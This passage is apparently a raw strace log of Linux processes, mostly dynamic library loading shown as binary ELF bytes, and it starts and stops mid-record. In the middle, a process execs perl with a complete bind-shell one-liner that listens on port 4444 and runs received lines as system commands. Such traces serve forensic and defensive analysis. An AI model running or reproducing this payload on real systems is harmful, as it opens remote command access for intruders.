\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10434 07:32:59.991608 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10434 07:32:59.991625 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e06000

10434 07:32:59.991636 mmap2(0xb7e0d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e0d000

10434 07:32:59.991653 close(1)          = 0

10434 07:32:59.991665 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.991678 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10434 07:32:59.991691 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10434 07:32:59.991825 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10434 07:32:59.991843 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dee000

10434 07:32:59.991858 mmap2(0xb7e02000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e02000

10434 07:32:59.991873 mmap2(0xb7e04000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e04000

10434 07:32:59.991887 close(1)          = 0

10434 07:32:59.991916 munmap(0xb7f94000, 29913) = 0

10434 07:32:59.991933 open("/etc/ld.so.cache", O_RDONLY) = 1

10434 07:32:59.991946 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10434 07:32:59.991962 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f94000

10434 07:32:59.991972 close(1)          = 0

10434 07:32:59.991982 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.991996 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10434 07:32:59.992010 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10434 07:32:59.992100 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10434 07:32:59.992117 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de4000

10434 07:32:59.992128 mmap2(0xb7dec000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dec000

10434 07:32:59.992144 close(1)          = 0

10434 07:32:59.992157 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10434 07:32:59.992170 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10434 07:32:59.992184 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10434 07:32:59.992404 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10434 07:32:59.992422 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd9000

10434 07:32:59.992433 mmap2(0xb7de2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7de2000

10434 07:32:59.992450 close(1)          = 0

10434 07:32:59.992471 munmap(0xb7f94000, 29913) = 0

10434 07:32:59.992491 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10434 07:32:59.992505 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10434 07:32:59.992517 _llseek(1, 0, [0], SEEK_CUR) = 0

10434 07:32:59.992529 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10434 07:32:59.992545 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f9b000

10434 07:32:59.992556 _llseek(1, 1624, [1624], SEEK_SET) = 0

10434 07:32:59.992571 munmap(0xb7f9b000, 1624) = 0

10434 07:32:59.992580 close(1)          = 0

10434 07:32:59.992608 getpgrp()         = 3831

10434 07:32:59.992619 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10434 07:32:59.992633 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10434 07:32:59.992649 brk(0x8101000)    = 0x8101000

10434 07:32:59.992680 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.992694 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.992708 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10434 07:32:59.992746 brk(0x8102000)    = 0x8102000

10434 07:32:59.992772 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10434 07:32:59.992800 stat64("/sbin/AB", 0xbfe22478) = -1 ENOENT (No such file or directory)

10434 07:32:59.992813 stat64("/bin/AB", 0xbfe22478) = -1 ENOENT (No such file or directory)

10434 07:32:59.992824 stat64("/usr/sbin/AB", 0xbfe22478) = -1 ENOENT (No such file or directory)

10434 07:32:59.992836 stat64("/usr/bin/AB", 0xbfe22478) = -1 ENOENT (No such file or directory)

10434 07:32:59.992849 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10434 07:32:59.992863 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0f6f8) = 10435

10435 07:32:59.992908 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10435 07:32:59.992925 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10435 07:32:59.992938 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10435 07:32:59.992950 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10435 07:32:59.992965 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10435 07:32:59.992980 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10435 07:32:59.992993 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10435 07:32:59.993049 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10435 07:32:59.993063 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10435 07:32:59.993131 exit_group(127)   = ?

10434 07:33:00.008031 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:33:00.008050 waitpid(10434,  <unfinished ...>

10434 07:33:00.008069 <... rt_sigprocmask resumed> NULL, 8) = 0

10434 07:33:00.008077 --- SIGCHLD (Child exited) @ 0 (0) ---

10434 07:33:00.008091 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10435

10434 07:33:00.008108 waitpid(-1, 0xbfe220f8, WNOHANG) = -1 ECHILD (No child processes)

10434 07:33:00.008118 sigreturn()       = ? (mask now [])

10434 07:33:00.008141 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10434 07:33:00.008157 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10434 07:33:00.008168 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10434 07:33:00.008180 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10434 07:33:00.008198 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10434 07:33:00.008209 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10434 07:33:00.008243 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10434 07:33:00.008263 stat64("/sbin/perl", 0xbfe224a8) = -1 ENOENT (No such file or directory)

10434 07:33:00.008275 stat64("/bin/perl", 0xbfe224a8) = -1 ENOENT (No such file or directory)

10434 07:33:00.008287 stat64("/usr/sbin/perl", 0xbfe224a8) = -1 ENOENT (No such file or directory)

10434 07:33:00.008298 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10434 07:33:00.008316 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10434 07:33:00.008352 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10434 07:33:00.008367 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0f6f8) = 10436

10436 07:33:00.008418 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10436 07:33:00.008435 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10436 07:33:00.008448 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10436 07:33:00.008459 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10436 07:33:00.008474 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10436 07:33:00.008490 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10436 07:33:00.008502 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10436 07:33:00.008535 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10436 07:33:00.008622 brk(0)            = 0x8153000

10436 07:33:00.008643 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.008658 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef8000

10436 07:33:00.008674 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.008691 open("/etc/ld.so.cache", O_RDONLY) = 1

10436 07:33:00.008703 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10436 07:33:00.008720 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef0000

10436 07:33:00.008730 close(1)          = 0

10436 07:33:00.008741 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.008757 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10436 07:33:00.008772 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10436 07:33:00.008872 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10436 07:33:00.008891 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eec000

10436 07:33:00.008903 mmap2(0xb7eee000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eee000

10436 07:33:00.008919 close(1)          = 0

10436 07:33:00.008930 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.008944 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10436 07:33:00.008958 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10436 07:33:00.009050 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10436 07:33:00.009067 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec7000

10436 07:33:00.009078 mmap2(0xb7eea000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7eea000

10436 07:33:00.009094 close(1)          = 0

10436 07:33:00.009106 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.009119 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10436 07:33:00.009133 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10436 07:33:00.009220 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10436 07:33:00.009236 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec6000

10436 07:33:00.009249 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eae000

10436 07:33:00.009260 mmap2(0xb7ec2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ec2000

10436 07:33:00.009274 mmap2(0xb7ec4000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec4000

10436 07:33:00.009288 close(1)          = 0

10436 07:33:00.009299 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.009312 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10436 07:33:00.009332 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10436 07:33:00.009422 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10436 07:33:00.009440 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5f000

10436 07:33:00.009455 mmap2(0xb7ea8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ea8000

10436 07:33:00.009469 mmap2(0xb7eab000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eab000

10436 07:33:00.009483 close(1)          = 0

10436 07:33:00.009495 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10436 07:33:00.009509 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10436 07:33:00.009523 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 